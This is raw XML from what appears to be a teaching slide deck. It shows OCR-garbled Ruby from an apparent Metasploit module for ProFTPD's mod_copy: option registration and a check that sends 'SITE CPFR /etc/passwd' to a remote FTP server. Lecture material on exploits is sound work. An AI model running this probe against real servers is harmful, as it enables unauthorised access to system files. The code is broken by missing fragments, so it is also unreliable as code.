    <w:p w14:paraId="22DB71FA" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:spacing w:after="45"/>
        <w:ind w:left="-84" w:right="-405"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7ED23CF0" wp14:editId="6278AFC2">
                <wp:extent cx="10515600" cy="95250"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="340772" name="Group 34077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515600" cy="95250"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="10515600" cy="95250"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="340771" name="Shape 340771"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="10515600" cy="952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15600" h="95250">
                                <a:moveTo>
                                  <a:pt x="0" y="47625"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="10515600" y="47625"/>
                                </a:lnTo>
                              </a:path>
                            </a:pathLst>
                          </a:custGeom>
                          <a:ln w="95250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340772" style="width:828pt;height:7.5pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordsize="105156,952">
                <v:shape id="Shape 340771" style="position:absolute;width:105156;height:952;left:0;top:0;" coordsize="10515600,95250" path="m0,47625l10515600,47625">
                  <v:stroke weight="7.5pt" endcap="flat" joinstyle="miter" miterlimit="1" on="true" color="#000000"/>
                  <v:fill on="false" color="#000000"/>
                </v:shape>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="16569" w:type="dxa"/>
        <w:tblInd w:w="-54" w:type="dxa"/>
        <w:tblCellMar>
          <w:top w:w="72" w:type="dxa"/>
          <w:left w:w="0" w:type="dxa"/>
          <w:bottom w:w="279" w:type="dxa"/>
          <w:right w:w="240" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="13425"/>
        <w:gridCol w:w="3144"/>
      </w:tblGrid>
      <w:tr w:rsidR="007A5F0C" w14:paraId="529269FA" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="3774"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="13425" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="000000"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="57B05411" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
            <w:pPr>
              <w:spacing w:after="332"/>
              <w:ind w:left="315"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="40"/>
              </w:rPr>
              <w:t>regi ster_options (</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2295FE9F" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
            <w:pPr>
              <w:spacing w:after="0" w:line="216" w:lineRule="auto"/>
              <w:ind w:left="1515" w:right="3150"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="34"/>
              </w:rPr>
              <w:t xml:space="preserve">optport . new( ' RPORT , [true, 'HTTP port', optport . new( ' RPORT_FTP ' , [t rue, FTP </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="34"/>
              </w:rPr>
              <w:t>21]),</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6F55E98F" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="465"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="40"/>
              </w:rPr>
              <w:t>OptString. new( ' TARGETURI ' , [true, 'Base path to the website' ,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4DEDFDF2" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="right"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="46"/>
              </w:rPr>
              <w:t>OptString. new( ' TMPPATH ' , [true, ' Absolute writable path', '/tmp' ])'</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3E341571" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="480" w:right="180" w:firstLine="1035"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="42"/>
              </w:rPr>
              <w:t xml:space="preserve">OptString. new( ' </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4AFB86F5" wp14:editId="2E754AE8">
                  <wp:extent cx="866775" cy="133350"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="128216" name="Picture 12821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216" name="Picture 128216"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId8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6775" cy="133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42"/>
              </w:rPr>
              <w:t>, [true, 'Absolute writable website path', self. class) end</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3144" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="6F27526F" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="38"/>
              </w:rPr>
              <w:t>/var/www' ])</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="55F88D30" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="4" w:line="265" w:lineRule="auto"/>
        <w:ind w:hanging="555"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="52"/>
        </w:rPr>
        <w:t>Because this operates as a module, it works with (and provides a short description for) some special variables.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B4D3D75" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="0"/>
        <w:ind w:hanging="555"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="54"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Remember: this is the Ruby programming language.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="54"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="64C78151" wp14:editId="54B8F4DD">
            <wp:extent cx="1409700" cy="1066800"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="128301" name="Picture 12830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301" name="Picture 128301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409700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pPr w:vertAnchor="text" w:tblpX="-684"/>
        <w:tblOverlap w:val="never"/>
        <w:tblW w:w="17460" w:type="dxa"/>
        <w:tblInd w:w="0" w:type="dxa"/>
        <w:tblCellMar>
          <w:top w:w="173" w:type="dxa"/>
          <w:left w:w="0" w:type="dxa"/>
          <w:bottom w:w="188" w:type="dxa"/>
          <w:right w:w="283" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="989"/>
        <w:gridCol w:w="9388"/>
        <w:gridCol w:w="7083"/>
      </w:tblGrid>
      <w:tr w:rsidR="007A5F0C" w14:paraId="4A6B8689" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="1449"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="853" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="1D3B953C" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="300"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="80"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="16607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11D8EF93" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="842" w:right="3332" w:hanging="660"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="38"/>
              </w:rPr>
              <w:t>def check ftp_port = datastore[ ' RPORT_FTP' sock = Rex: : Socket. 'PeerHost rhost, ' PeerPort ' ftp_port)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007A5F0C" w14:paraId="17E7ED7A" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="660"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="1A150F16" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="007A5F0C"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="16607" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:vMerge w:val="restar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34F08640" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="842"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="38"/>
              </w:rPr>
              <w:t>if sock. nil?</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0A5B1521" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="center" w:pos="3699"/>
                <w:tab w:val="center" w:pos="11379"/>
              </w:tabs>
              <w:spacing w:after="191"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="42"/>
              </w:rPr>
              <w:tab/>
              <w:t>fail_with(Fai1ure: : Unreachable,</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="42"/>
              </w:rPr>
              <w:tab/>
              <w:t>rhost} :</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5696A677" wp14:editId="6C7CF773">
                  <wp:extent cx="1143000" cy="171450"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="129981" name="Picture 12998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9981" name="Picture 129981"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId8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0" cy="171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42"/>
              </w:rPr>
              <w:t xml:space="preserve"> - Failed to connect to FTP server")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6346383A" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="842" w:right="4517" w:firstLine="330"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="34"/>
              </w:rPr>
              <w:t>print_ status( rhost}</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="112DD6EA" wp14:editId="269A8449">
                  <wp:extent cx="1209675" cy="171450"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="129982" name="Picture 12998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9982" name="Picture 129982"/>
                          <pic:cNvPicPr/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9675" cy="171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34"/>
              </w:rPr>
              <w:t xml:space="preserve"> - Connected to FTP server") end</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007A5F0C" w14:paraId="4126ECF3" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="1515"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="853" w:type="dxa"/>
            <w:vMerge w:val="restart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vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="378E2415" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
            <w:pPr>
              <w:spacing w:after="1080"/>
              <w:ind w:left="285"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="66"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="630B0D66" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="270"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="76"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:gridSpan w:val="2"/>
            <w:vMerge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A0DDEBE" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="007A5F0C"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007A5F0C" w14:paraId="2380A275" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="1275"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="0D5CFC86" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="007A5F0C"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9437" w:type="dxa"/>
            <w:vMerge w:val="restar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vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="435056C7" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="842" w:right="257" w:firstLine="15"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="40"/>
              </w:rPr>
              <w:t xml:space="preserve">res = sock. </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="10D19D9E" wp14:editId="5498799C">
                  <wp:extent cx="1152525" cy="180975"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="129875" name="Picture 12987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9875" name="Picture 129875"/>
                          <pic:cNvPicPr/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2525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40"/>
              </w:rPr>
              <w:t xml:space="preserve"> 10) unless res &amp;&amp; res. include? ('220' ) fail_with(Fai1ure: : Unknown, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="787E2CE3" wp14:editId="1B8CEACA">
                  <wp:extent cx="1962150" cy="171450"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="129876" name="Picture 12987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9876" name="Picture 129876"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId9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2150" cy="171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40"/>
              </w:rPr>
              <w:t>end</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7170" w:type="dxa"/>
            <w:vMerge w:val="restart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vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="7C1DEFAC" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="44"/>
              </w:rPr>
              <w:t>- Failure retrieving ProFTPD 220 banner")</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007A5F0C" w14:paraId="6FAA058E" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="450"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="853" w:type="dxa"/>
            <w:vMerge w:val="restart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</w:tcPr>
          <w:p w14:paraId="18E5177B" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="007A5F0C"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vMerge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</w:tcPr>
          <w:p w14:paraId="27C28D45" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="007A5F0C"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="6DB263C2" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="007A5F0C"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007A5F0C" w14:paraId="5C69BCE4" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="1350"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="68A410FE" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="007A5F0C"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9437" w:type="dxa"/>
            <w:vMerge w:val="restar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</w:tcPr>
          <w:p w14:paraId="792CDC94" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
            <w:pPr>
              <w:spacing w:after="0" w:line="216" w:lineRule="auto"/>
              <w:ind w:left="857" w:right="2102"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="40"/>
              </w:rPr>
              <w:t>sock. puts("SITE CPFR /etc/passwd\r\n") res = sock. 10) if res &amp;&amp; res. include? 350' )</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="491700B8" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
            <w:pPr>
              <w:spacing w:after="16"/>
              <w:ind w:left="1187"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="34"/>
              </w:rPr>
              <w:t>Exploit: : CheckCode: : Vulnerable</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="12835C80" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="347" w:right="4052" w:firstLine="840"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="34"/>
              </w:rPr>
              <w:t>Exploit: : CheckCode: : Safe end end</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7170" w:type="dxa"/>
            <w:vMerge w:val="restart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</w:tcPr>
          <w:p w14:paraId="5480632E" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="007A5F0C"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007A5F0C" w14:paraId="545FB3F9" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="855"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="85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F806738" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="255"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="70"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="000000"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="5C04BADD" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="007A5F0C"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="3C81A33A" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="007A5F0C"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007A5F0C" w14:paraId="424CC228" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="1378"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="853" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="000000"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="7688315E" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="007A5F0C"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vMerge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</w:tcPr>
          <w:p w14:paraId="61DAE226" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="007A5F0C"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="2522C783" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="007A5F0C"/>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="15C16302" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="-1464" w:right="17535"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251693056" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="0" wp14:anchorId="081817A2" wp14:editId="1F4F69EF">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>11572875</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>5000625</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="390525" cy="1724025"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="130060" name="Picture 13006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060" name="Picture 130060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390525" cy="17240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94080" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="449FC59F" wp14:editId="406D4FC2">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>1104900</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="page">
                  <wp:posOffset>6562725</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="10010775" cy="19050"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="340774" name="Group 34077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010775" cy="19050"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="10010775" cy="19050"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="340773" name="Shape 340773"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="10010775" cy="190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10775" h="19050">
                                <a:moveTo>
                                  <a:pt x="0" y="9525"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="10010775" y="9525"/>
                                </a:lnTo>
                              </a:path>
                            </a:pathLst>
                          </a:custGeom>
                          <a:ln w="19050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340774" style="width:788.25pt;height:1.5pt;position:absolute;mso-position-horizontal-relative:page;mso-position-horizontal:absolute;margin-left:87pt;mso-position-vertical-relative:page;margin-top:516.75pt;" coordsize="100107,190">
                <v:shape id="Shape 340773" style="position:absolute;width:100107;height:190;left:0;top:0;" coordsize="10010775,19050" path="m0,9525l10010775,9525">
                  <v:stroke weight="1.5pt" endcap="flat" joinstyle="miter" miterlimit="1" on="true" color="#000000"/>
                  <v:fill on="false" color="#000000"/>
                </v:shape>
                <w10:wrap type="topAndBottom"/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="36FFFB79" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="007A5F0C">
      <w:pPr>
        <w:sectPr w:rsidR="007A5F0C">
          <w:headerReference w:type="even" r:id="rId93"/>
          <w:headerReference w:type="default" r:id="rId94"/>
          <w:footerReference w:type="even" r:id="rId95"/>
          <w:footerReference w:type="default" r:id="rId96"/>
          <w:headerReference w:type="first" r:id="rId97"/>
          <w:footerReference w:type="first" r:id="rId98"/>
          <w:pgSz w:w="19200" w:h="10800" w:orient="landscape"/>
          <w:pgMar w:top="1348" w:right="1665" w:bottom="180" w:left="1464" w:header="156" w:footer="720" w:gutter="0"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="155F3032" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="-1440" w:right="17760"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251695104" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="0" wp14:anchorId="3C99AE01" wp14:editId="6EB51EBF">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>0</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>781050</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="12192000" cy="6076950"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="340775" name="Picture 34077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775" name="Picture 340775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12192000" cy="60769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br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FC89C77" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="-1440" w:right="17760"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
